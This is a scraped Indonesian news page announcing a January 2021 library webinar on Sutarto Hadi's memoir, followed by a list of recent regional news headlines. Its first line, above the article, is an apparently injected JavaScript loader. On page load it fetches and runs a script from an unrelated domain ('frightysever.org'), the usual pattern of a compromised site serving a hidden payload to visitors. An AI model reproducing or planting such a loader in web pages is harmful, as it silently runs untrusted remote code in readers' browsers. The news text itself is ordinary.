(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Categories: Dispersip Kalsel

Webinar Perdana di 2021, Dispersip Kalsel Gelar Bicara Buku Sutarto Hadi


KANALKALIMANTAN.COM, BANJARMASIN – Membangun tradisi literasi di Kalsel, Dinas Perpustakaan dan Arsip (Dispersip) Provinsi Kalsel bakal menggelar acara “Bicara Buku” di Perpustakaan Palnam Banjarmasin, mengawali tahun 2021.

Kali ini buku yang dibahas adalah karya Rektor Universitas Lambung Mangkurat (ULM) Prof Sutarto Hadi “Membingkai Bayang-Bayang”.

Acara “Bicara Buku” akan digelar pada Rabu, 13 Januari 2021, pukul 14.00 Wita. Dimoderatori Randu Alamsyah dan bisa disaksikan langsung di zoom dan youtube Dispersip Kalsel. Registrasi Pendaftaran Peserta Talkshow ada pada link http://bit.ly/Bicara-Buku.

“Membingkai Bayang-Bayang” adalah sebuah memoar perjalanan Sutaro Hadi dalam mengejar pendidikan dan karier, sehingga berhasil menjadi rektor Universitas Lambung Mangkurat.

 

Buku yang diterbitkan oleh Elex Media Komputindo ini telah meraih predikat best-seller nasional sejak diterbitkan di pertengahan 2019 lalu. Kisah seorang anak yatim piatu yang gigih mengejar mimpinya, rupanya menjadi inspirasi bagi banyak orang.

“Bicara Buku” kali ini selain akan menghadirkan Sutarto Hadi sendiri, juga ada Pemimpin Redaksi Berita ULM, Sumasno Hadi. Selain itu ada Akademisi ULM dan seorang kritikus sastra Sainul Hermawan.

Kepala Dispersip Kalsel Dra Hj Nurliani Dardie mengatakan turut berbangga karena kantornya bisa menggelar bincang buku Rektor ULM Sutarto Hadi ini. “Ada banyak semangat dan inspirasi dari buku beliau yang patut untuk disebarkan ke khalayak luas,” ucapnya.

Bunda Nunung –biasa disapa- mengatakan meski masih dalam masa pandemi, Dispersip Kalsel selalu mengambil peran dalam pencerdasan dan pengembangan kualitas sumber daya manusia. Utamanya melalui buku-buku dan perbincangan yang inspiratif. “Ini adalah edisi ke-20 dari webinar yang kita gelar di masa pandemi, pertama di tahun 2021,” ucap Bunda Nunung. (kanalkalimantan.com/rls)

 

Reporter : Rls
Editor : Kk

Al Ghifari

Recent Posts

Diakhiri Nobar Timnas, Pj Bupati Kapuas Menutup Expo Kapuas 2024

KANALKALIMANTAN.COM, KUALA KAPUAS - Penjabat (Pj) Bupati Kapuas Erlin Hardi secara resmi menutup gelaran Expo… Read More

39 menit ago

Bingkisan Kebahagiaan PLN untuk Warga Kalsel yang Membutuhkan

KANALKALIMANTAN.COM, BANJARBARU - PT PLN (Persero) Unit Induk Penyaluran dan Pusat Pengatur (UIP3B) Kalimantan melalui… Read More

53 menit ago

Asa Warga Banjarmasin Timnas Indonesia Masuk Olimpiade Paris 2024

KANALKALIMANTAN.COM, BANJARMASIN - Nonton bareng (Nobar) laga semifinal AFC U-23 Indonesia vs Uzbekistan di halaman… Read More

1 jam ago

Ini Tiga Rekor Muri Sebagai Kado HUT ke-73 Kabupaten Kapuas

KANALKALIMANTAN.COM, KUALA KAPUAS – Tiga rekor Museum Rekor Indonesia (Muri) menjadi catatan kado Hari Jadi… Read More

1 jam ago

Ritual Laluhan dan Ngarunya Lengkapi Perayaan HUT ke-73 Kabupaten Kapuas

KANALKALIMANTAN.COM, KUALA KAPUAS - Momen perayaan Hari Jadi ke-218 Kota Kuala Kapuas dan Hari Ulang… Read More

1 jam ago

Laga Terakhir Timnas Indonesia Berharap Juara Ketiga Piala Asia U-23

KANALKALIMANTAN.COM, BANJARBARU - Tim Nasional (Timnas) Indonesia U-23 dipastikan gagal melaju ke final Piala Asia… Read More

3 jam ago

This website uses cookies.